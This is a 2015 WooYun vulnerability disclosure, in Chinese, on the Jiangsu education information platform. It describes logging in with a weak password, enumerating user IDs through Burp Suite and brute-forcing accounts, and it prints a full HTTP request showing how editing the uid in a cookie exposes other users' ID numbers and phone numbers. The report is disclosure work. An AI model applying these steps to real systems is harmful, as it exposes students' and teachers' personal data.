漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0133539
漏洞标题:江苏省教育信息化公共服务平台某漏洞导致信息泄露
相关厂商:江苏省教育信息化公共服务平台
漏洞作者: 隔壁老三
提交时间:2015-08-14 11:53
修复时间:2015-09-28 10:56
公开时间:2015-09-28 10:56
漏洞类型:未授权访问/权限绕过
危害等级:高
自评Rank:17
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-14: 细节已通知厂商并且等待厂商处理中
2015-08-14: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-24: 细节向核心白帽子及相关领域专家公开
2015-09-03: 细节向普通白帽子公开
2015-09-13: 细节向实习白帽子公开
2015-09-28: 细节向公众公开
简要描述:
江苏省教育信息化公共服务平台一处越权,以及对大量账号爆破测试~
详细说明:
漏洞证明:
登陆地址http://**.**.**.**/login.aspx
使用一个账号为 CXZX王力 密码123456 登陆
先来做一个信息收集
点击右上角 找人~ 在搜索栏里随便输入一个c
出来一大堆用户,点击发现地址栏里有id= ~
于是使用Burpsuite搜集账号
使用Burpsuite,修改id。使用Interder搜集了一大堆账号
再先退出登陆,使用搜集的账号进行登陆
虽然密码用MD5的方法加了密,然而并没什么卵用0.0
------------------------------------------我是分界线,下面是重点
这里是一枚越权
首先,使用一个账号登陆。经过上面的步骤,账号已经数不胜数了
登陆后有一个基本信息
<
打开Burpsuite拦截
刷新页面
GET /index.php?m=ta&id=50383629 HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: jse_up=uid%3d50378298%26username%3dcxzx%e7%8e%8b%e5%8a%9b%26nickname%3d%e5%9f%8e%e8%a5%bf%e4%b8%ad%e5%ad%a6%e7%8e%8b%e5%8a%9b%26name%3d%e7%8e%8b%e5%8a%9b%26locationcode%3d320721%26location%3d%e8%b5%a3%e6%a6%86%e5%8e%bf%26orgcode%3d3207213006%26orgname%3d%e8%bf%9e%e4%ba%91%e6%b8%af%e5%b8%82%e5%9f%8e%e8%a5%bf%e4%b8%ad%e5%ad%a6%26orgtype%3dS%26utype%3d4%26d_utype%3d4%26isadm%3dFalse%26email%3d%26url%3d%26p_img%3dhttp%3a%2f%**.**.**.**%2ffs%2fPlatformAvatar%2fao-z1-d1%2f50378298%26domain%3d%26gender%3d1%26orglocationcode%3d320721%26orglocationname%3d%e8%b5%a3%e6%a6%86%e5%8e%bf%26ismaster%3dFalse; jse_ut=b2F1dGhfdG9rZW49MmZiNWY1OTU2M2NlNDIzNmFhN2ZiZTI1YTA4NmUzMDY1MDM3ODI5OCZvYXV0aF90b2tlbl9zZWNyZXQ9MTZkOGJiZGYtMDYwMy00NDQ5LTg0MmYtMzI0OWQ3ZDhkNTMw; jse_id=MGJlOGE0ZGMtMDhmNi00MzUzLWIyMzktNGM4ZDY5MzM5ZWM2; PHPSESSID=dgt96butt30mng5o37d128l7s6; IS_MOBILE_AGENT=0; __rrt_wId=797
将Cookie: jse_up=uid%3d50378298%26username%3dcxzx% 中的uid 50378298进行修改 随便成50378124吧,只要id存在就行。
此处泄露了用户身份证信息,手机号,部分邮箱,教师或者学生,家长所在学校。因为是江苏全省,通过id数量就可以看出用户数量多,信息量大大的~
修复方案:
你们比我聪明比我强
版权声明:转载请注明来源 隔壁老三@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2015-08-14 10:55
厂商回复:
CNVD确认所述情况,已经转由CNCERT下发给相应分中心分中心,由其后续协调网站管理单位处置。
最新状态:
暂无